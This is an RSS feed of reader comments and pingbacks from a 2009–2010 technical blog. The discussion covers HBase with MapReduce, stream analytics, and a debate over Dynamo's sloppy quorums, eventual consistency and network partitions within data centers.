<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments for Joydeep Sen Sarma's blog</title>
	<atom:link href="http://jsensarma.com/blog/comments/feed/" rel="self" type="application/rss+xml" />
	<link>http://jsensarma.com/blog</link>
	<description>musings on computing and storage</description>
	<lastBuildDate>Tue, 20 Apr 2010 02:46:14 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>Comment on HBase and Map-Reduce by Hbase and Mapreduce &#124; Analytics Team</title>
		<link>http://jsensarma.com/blog/2010/04/07/hbase-and-map-reduce/comment-page-1/#comment-175</link>
		<dc:creator>Hbase and Mapreduce &#124; Analytics Team</dc:creator>
		<pubDate>Tue, 20 Apr 2010 02:46:14 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=74#comment-175</guid>
		<description>[...] Here&#8217;s a post from Joydeep Sen Sarma about the combo of Hbase and Mapreduce. [...]</description>
		<content:encoded><![CDATA[<p>[...] Here&#8217;s a post from Joydeep Sen Sarma about the combo of Hbase and Mapreduce. [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on HBase and Map-Reduce by Mike Clarke</title>
		<link>http://jsensarma.com/blog/2010/04/07/hbase-and-map-reduce/comment-page-1/#comment-159</link>
		<dc:creator>Mike Clarke</dc:creator>
		<pubDate>Thu, 08 Apr 2010 16:05:28 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=74#comment-159</guid>
		<description>@Jeff I see the benefits of a distributed DB especially if you can build multiple static tables for reporting or lookups, each with their own indexing, on the fly during transactional processing.  I am wondering if it would help for optimization of localized data based on language?</description>
		<content:encoded><![CDATA[<p>@Jeff I see the benefits of a distributed DB especially if you can build multiple static tables for reporting or lookups, each with their own indexing, on the fly during transactional processing.  I am wondering if it would help for optimization of localized data based on language?</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on HBase and Map-Reduce by Joydeep</title>
		<link>http://jsensarma.com/blog/2010/04/07/hbase-and-map-reduce/comment-page-1/#comment-157</link>
		<dc:creator>Joydeep</dc:creator>
		<pubDate>Wed, 07 Apr 2010 05:40:47 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=74#comment-157</guid>
		<description>@Jeff - interesting project - need to keep up to date! I agree - a third computing tier feeding off the real-time logs for stream processing makes a lot of sense. materialized views would be awesome (would kill all of E, T &amp; L).</description>
		<content:encoded><![CDATA[<p>@Jeff &#8211; interesting project &#8211; need to keep up to date! I agree &#8211; a third computing tier feeding off the real-time logs for stream processing makes a lot of sense. materialized views would be awesome (would kill all of E, T &#038; L).</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on HBase and Map-Reduce by Tweets that mention HBase and Map-Reduce « Joydeep Sen Sarma’s blog -- Topsy.com</title>
		<link>http://jsensarma.com/blog/2010/04/07/hbase-and-map-reduce/comment-page-1/#comment-156</link>
		<dc:creator>Tweets that mention HBase and Map-Reduce « Joydeep Sen Sarma’s blog -- Topsy.com</dc:creator>
		<pubDate>Wed, 07 Apr 2010 05:04:44 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=74#comment-156</guid>
		<description>[...] This post was mentioned on Twitter by Jean-Daniel, Imran M Yousuf. Imran M Yousuf said: RT @jdcryans: Joydeep tries something less controversial and explores the multiple possibilities of #mapreduce, #hbase and #hive http://su.pr/1xFET7 [...]</description>
		<content:encoded><![CDATA[<p>[...] This post was mentioned on Twitter by Jean-Daniel, Imran M Yousuf. Imran M Yousuf said: RT @jdcryans: Joydeep tries something less controversial and explores the multiple possibilities of #mapreduce, #hbase and #hive <a href="http://su.pr/1xFET7" rel="nofollow">http://su.pr/1xFET7</a> [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on HBase and Map-Reduce by Jeff</title>
		<link>http://jsensarma.com/blog/2010/04/07/hbase-and-map-reduce/comment-page-1/#comment-155</link>
		<dc:creator>Jeff</dc:creator>
		<pubDate>Wed, 07 Apr 2010 04:32:47 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=74#comment-155</guid>
		<description>Hey Joy,

I think there&#039;s a third class of low-latency analytics to be performed against data as it&#039;s generated. The DBToaster project (http://www.cs.cornell.edu/bigreddata/dbtoaster/) gives a good example. I&#039;m curious to see the size of each of these domains (essentially &lt; 1 sec, &lt; 1 min, &lt; 1 hr).

Later,
Jeff</description>
		<content:encoded><![CDATA[<p>Hey Joy,</p>
<p>I think there&#8217;s a third class of low-latency analytics to be performed against data as it&#8217;s generated. The DBToaster project (<a href="http://www.cs.cornell.edu/bigreddata/dbtoaster/" rel="nofollow">http://www.cs.cornell.edu/bigreddata/dbtoaster/</a>) gives a good example. I&#8217;m curious to see the size of each of these domains (essentially &lt; 1 sec, &lt; 1 min, &lt; 1 hr).</p>
<p>Later,<br />
Jeff</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Dynamo: A flawed architecture &#8211; Part I by Mike Spreitzer</title>
		<link>http://jsensarma.com/blog/2009/11/01/dynamo-a-flawed-architecture-part-i/comment-page-1/#comment-154</link>
		<dc:creator>Mike Spreitzer</dc:creator>
		<pubDate>Fri, 13 Nov 2009 04:10:56 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=55#comment-154</guid>
		<description>BTW, the hash trees that Dynamo uses are credited to Ralph, not Angela.  It is spelled &quot;Merkle&quot;.</description>
		<content:encoded><![CDATA[<p>BTW, the hash trees that Dynamo uses are credited to Ralph, not Angela.  It is spelled &#8220;Merkle&#8221;.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Dynamo: A flawed architecture &#8211; Part I by tecosystems &#187; links for 2009-11-11</title>
		<link>http://jsensarma.com/blog/2009/11/01/dynamo-a-flawed-architecture-part-i/comment-page-1/#comment-153</link>
		<dc:creator>tecosystems &#187; links for 2009-11-11</dc:creator>
		<pubDate>Thu, 12 Nov 2009 01:05:01 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=55#comment-153</guid>
		<description>[...] Dynamo: A flawed architecture &#8211; Part I « Joydeep Sen Sarma’s blog pushback to Dynamo (tags: dynamo amazon scalability architecture distributed computing scaling nosql key-value eventual consistency) [...]</description>
		<content:encoded><![CDATA[<p>[...] Dynamo: A flawed architecture &#8211; Part I « Joydeep Sen Sarma’s blog pushback to Dynamo (tags: dynamo amazon scalability architecture distributed computing scaling nosql key-value eventual consistency) [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Dynamo &#8211; Part I: a followup and re-rebuttals by Kannan</title>
		<link>http://jsensarma.com/blog/2009/11/03/dynamo-part-i-a-followup-and-re-rebuttals/comment-page-1/#comment-150</link>
		<dc:creator>Kannan</dc:creator>
		<pubDate>Thu, 05 Nov 2009 06:41:22 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=64#comment-150</guid>
		<description>@Benjamin: I am not sure if you parsed my comment right. The case I am describing does not necessarily involve a partition. C could be down due to a variety of reasons. Also, in my example, the read that happens after the failed write is not on C (as you mentioned) but at A.</description>
		<content:encoded><![CDATA[<p>@Benjamin: I am not sure if you parsed my comment right. The case I am describing does not necessarily involve a partition. C could be down due to a variety of reasons. Also, in my example, the read that happens after the failed write is not on C (as you mentioned) but at A.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Dynamo: A flawed architecture &#8211; Part I by Lee</title>
		<link>http://jsensarma.com/blog/2009/11/01/dynamo-a-flawed-architecture-part-i/comment-page-1/#comment-148</link>
		<dc:creator>Lee</dc:creator>
		<pubDate>Wed, 04 Nov 2009 16:17:38 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=55#comment-148</guid>
		<description>Why are you assuming dynamo only runs in one data center?</description>
		<content:encoded><![CDATA[<p>Why are you assuming dynamo only runs in one data center?</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Dynamo &#8211; Part I: a followup and re-rebuttals by Joydeep</title>
		<link>http://jsensarma.com/blog/2009/11/03/dynamo-part-i-a-followup-and-re-rebuttals/comment-page-1/#comment-146</link>
		<dc:creator>Joydeep</dc:creator>
		<pubDate>Wed, 04 Nov 2009 07:40:06 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=64#comment-146</guid>
		<description>@benjamin: regarding amazon usage - perhaps i shouldn&#039;t have commented on it (i was passing on a second-hand story - but that&#039;s all it is). but i believe the relative success of bigtable is very much pertinent to this discussion. i don&#039;t think one could have provided an eventually consistent data store and achieved the same success as appengine with application developers.

i have posted a correction on my post about the vector clock stuff and explained why it happened. we were deep in discussions about Cassandra - and it doesn&#039;t use vector timestamps.

thank goodness u agree about Consistency. So does Avinash. What i have tried to point out is that the Dynamo paper&#039;s section on quorums and consistency is confusing like hell. It leads readers to believe that they can get consistency - when they can&#039;t (with 100% odds). If u look at Jonathan&#039;s arguments - he&#039;s continuing to insist that there are proper read/write quorums in Dynamo/Cassandra - whereas there aren&#039;t. The term &#039;sloppy quorum&#039; is used for a reason and the system is only &#039;eventually consistent&#039; for the same reason.

i haven&#039;t said that relaxed consistency is not attractive for some applications. i am also not saying that dynamo is only deployed within a single data center. what i am saying though is that consistency needs to be relaxed only when partitioning is possible - and that this can be built as a separate layer above a data store with CA. the other thing that i keep stressing is that having bounds on inconsistency is a matter of practical importance. while recovering from an event like a disaster, one is faced with a choice between bringing significantly old data online and staying unavailable. In such admin-initiated actions - it&#039;s very important to have some idea of how much data could potentially be lost. The reason is simply that if data is significantly out of date - one might rather choose to be unavailable for the couple of days that it takes to repair the disaster.

i continue to disagree about partitions within a single data center. u had asked whether i had on-the-ground experience in a web company. it might help to know then that my comments about core switches and partitioning are not some figment of imagination - but derived from actual events from our site - one of the largest in the world. any kind of network partition in our data centers is usually catastrophic. we are simply unable to lose network access to one of our core services (from say our web tier) and continue functioning normally (from that data center). this would be fairly typical of any web site. so we must build arrangements that prevent network partitions in a data center. rack failures (which are usually switch failures) are another case (that are almost like partitions) - but this problem is easily solved by replicating across racks (a la hdfs). important central servers have to be attached to multiple switches.

i think this is a critical point (without which the argument for starting with CA only falls apart). FWIW - i have had almost total success internally with this argument (people immediately agree from experience that partitions are simply intolerable within a data center). 

(btw - on a related point - S3 is eventually consistent as well - and it&#039;s a total pain to deal with that aspect of it (first hand experience working out Hive integration with Amazon guys). i almost felt sorry for Amazon engineers as they kept explaining how screwed up the semantics were. some day amazon will have to fix it (competition is coming)).</description>
		<content:encoded><![CDATA[<p>@benjamin: regarding amazon usage &#8211; perhaps i shouldn&#8217;t have commented on it (i was passing on a second-hand story &#8211; but that&#8217;s all it is). but i believe the relative success of bigtable is very much pertinent to this discussion. i don&#8217;t think one could have provided an eventually consistent data store and achieved the same success as appengine with application developers.</p>
<p>i have posted a correction on my post about the vector clock stuff and explained why it happened. we were deep in discussions about Cassandra &#8211; and it doesn&#8217;t use vector timestamps.</p>
<p>thank goodness u agree about Consistency. So does Avinash. What i have tried to point out is that the Dynamo paper&#8217;s section on quorums and consistency is confusing like hell. It leads readers to believe that they can get consistency &#8211; when they can&#8217;t (with 100% odds). If u look at Jonathan&#8217;s arguments &#8211; he&#8217;s continuing to insist that there are proper read/write quorums in Dynamo/Cassandra &#8211; whereas there aren&#8217;t. The term &#8216;sloppy quorum&#8217; is used for a reason and the system is only &#8216;eventually consistent&#8217; for the same reason.</p>
<p>i haven&#8217;t said that relaxed consistency is not attractive for some applications. i am also not saying that dynamo is only deployed within a single data center. what i am saying though is that consistency needs to be relaxed only when partitioning is possible &#8211; and that this can be built as a separate layer above a data store with CA. the other thing that i keep stressing is that having bounds on inconsistency is a matter of practical importance. while recovering from an event like a disaster, one is faced with a choice between bringing significantly old data online and staying unavailable. In such admin-initiated actions &#8211; it&#8217;s very important to have some idea of how much data could potentially be lost. The reason is simply that if data is significantly out of date &#8211; one might rather choose to be unavailable for the couple of days that it takes to repair the disaster.</p>
<p>i continue to disagree about partitions within a single data center. u had asked whether i had on-the-ground experience in a web company. it might help to know then that my comments about core switches and partitioning are not some figment of imagination &#8211; but derived from actual events from our site &#8211; one of the largest in the world. any kind of network partition in our data centers is usually catastrophic. we are simply unable to lose network access to one of our core services (from say our web tier) and continue functioning normally (from that data center). this would be fairly typical of any web site. so we must build arrangements that prevent network partitions in a data center. rack failures (which are usually switch failures) are another case (that are almost like partitions) &#8211; but this problem is easily solved by replicating across racks (a la hdfs). important central servers have to be attached to multiple switches.</p>
<p>i think this is a critical point (without which the argument for starting with CA only falls apart). FWIW &#8211; i have had almost total success internally with this argument (people immediately agree from experience that partitions are simply intolerable within a data center). </p>
<p>(btw &#8211; on a related point &#8211; S3 is eventually consistent as well &#8211; and it&#8217;s a total pain to deal with that aspect of it (first hand experience working out Hive integration with Amazon guys). i almost felt sorry for Amazon engineers as they kept explaining how screwed up the semantics were. some day amazon will have to fix it (competition is coming)).</p>
]]></content:encoded>
	</item>
</channel>
</rss>
